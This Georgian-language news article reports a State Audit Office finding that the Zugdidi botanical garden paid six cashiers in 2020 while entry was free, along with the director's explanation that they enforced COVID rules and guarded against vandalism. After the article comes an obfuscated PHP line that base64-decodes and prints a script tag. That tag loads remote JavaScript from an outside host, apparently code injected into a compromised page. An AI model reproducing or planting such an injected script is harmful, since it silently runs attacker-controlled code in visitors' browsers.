celsiusi
ავერსი საქკაბელი
2020 წელს ზუგდიდის ბოტანიკურ ბაღში მოლარე-კონსულტანტები იყვნენ დასაქმებულნი იმ ფონზე, როცა ბაღში შესვლა უფასოა. აღნიშნულის შესახებ ნათქვამია სახელმწიფო აუდიტის სამსახურის ანგარიშში, რომელიც ზუგდიდის მუნიციპალიტეტის 2019-20 წლების საქმიანობას ეხება.
 
“2020 წელს ა(ა)იპ − ბოტანიკური ბაღების მართვის ცენტრში დასაქმებული იყო 6 მოლარე-კონსულტანტი, რომელთა ხელფასებზე დაიხარჯა 50.3 ათასი ლარი.
 
აუდიტის ჯგუფის მიერ ბოტანიკური ბაღის დათვალიერებით გამოვლინდა, რომ ბაღში შესვლა უფასოა და სალაროები არ ფუნქციონირებს. შესაბამისად, ხელფასები გაიცემა პირებზე, რომელთა ფუნქცია-მოვალეობები არ არის შესრულებადი”, — ვკითხულობთ ანგარიშში.
 
ზუგდიდის ბოტანიკური ბაღი დამთვალიერებლებისთვის 2019 წლის 30 დეკემბერს გაიხსნა. როგორც ბაღის დირექტორი ზვიად ქარჩავა “ნეტგაზეთთან” საუბრისას დასძენს, იქ შესვლა თავდაპირველად ფასიანი იყო და ამიტომაც იყვნენ დასაქმებულნი მოლარეები.
 
თუმცა, როგორც ჰყვება, ვითარება პანდემიის კრიზისის დაწყების შემდეგ შეიცვალა.
 
“[დაიწყო] პანდემია, ლოკდაუნი გამოცხადდა ქვეყანაში. ამ მოლარეებს მოქმედი ხელშეკრულება ჰქონდათ, ლოკდაუნი კი იყო რაღაც ვადით, ხომ? 1 კვირით, 1 თვით… ზუსტად არავინ იცოდა, როდის დამთავრდებოდა ლოკდაუნი.
 
რადგან ბოტანიკური ბაღი არის რეკრეაციული სივრცე, 26 ჰექტარი, სადაც ადამიანებს შეუძლიათ, თავისუფლად იმოძრაონ, მიიღეს გადაწყვეტილება, რომ ბაღი იყოს უფასო და ყველას ჰქონდეს აქ შემოსვლის შესაძლებლობა”, — დასძენს ქარჩავა.
 
მისივე თქმით, ადამიანებს, რომლებიც პანდემიამდე მოლარეებად საქმიანობდნენ,  კოვიდ-რეგულაციების დაცვის მაკონტროლებლის ფუნქცია მიენიჭათ და სწორედ ამ მისიით დარჩნენ სამუშაო ადგილებზე.
 
“იყო რეგულაციები: შემოსვლის დროს სიცხის გაზომვა, შეკრებების [შეზღუდვა], პირბადის ტარება… და ჩვენ, რახან პანდემია იყო, მოლარეებს დავაკისრეთ ეგ ფუნქცია, რომ სანამ ფასიანი [გახდებოდა შემოსვლა], მანამდე დაგვხმარებოდნენ ამ მიმართულებით.
 
ასევე, როცა უფასო გახდა შემოსვლა, ბევრი ხალხი შემოდიოდა, იყო ვანდალიზმის ფაქტები. ამიტომ გვჭირდებოდა ეს ადამიანები, რომ ზედამხედველის ფუნქციაც შეესრულებინათ”, — გვითხრა ბაღის დირექტორმა.
 
დამაზუსტებელი კითხვის საპასუხოდ, ქარჩავამ განმარტა, რომ ბაღს ჰყავს დაცვა, რომელიც უსაფრთხოებას უზრუნველყოფს, თუმცა ცვლაში 3 ადამიანი მუშაობს და “26 ჰექტარი 3 ადამიანით ვერ გაკონტროლდება”.
 
ზვიად ქარჩავას თქმით, ხსენებულ 6 ადამიანს კონტრაქტის ვადა ამოეწურათ და ამჟამად ბოტანიკურ ბაღს მოლარე-ოპერატორები აღარ ჰყავს. თუმცა, მისივე განმარტებით, შესაბამისი შტატი კვლავ არსებობს და როცა ბაღში შესვლა ფასიანი გახდება, ადმინისტრაციას ისევ მოძებნის 6 მოლარეს.
865
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");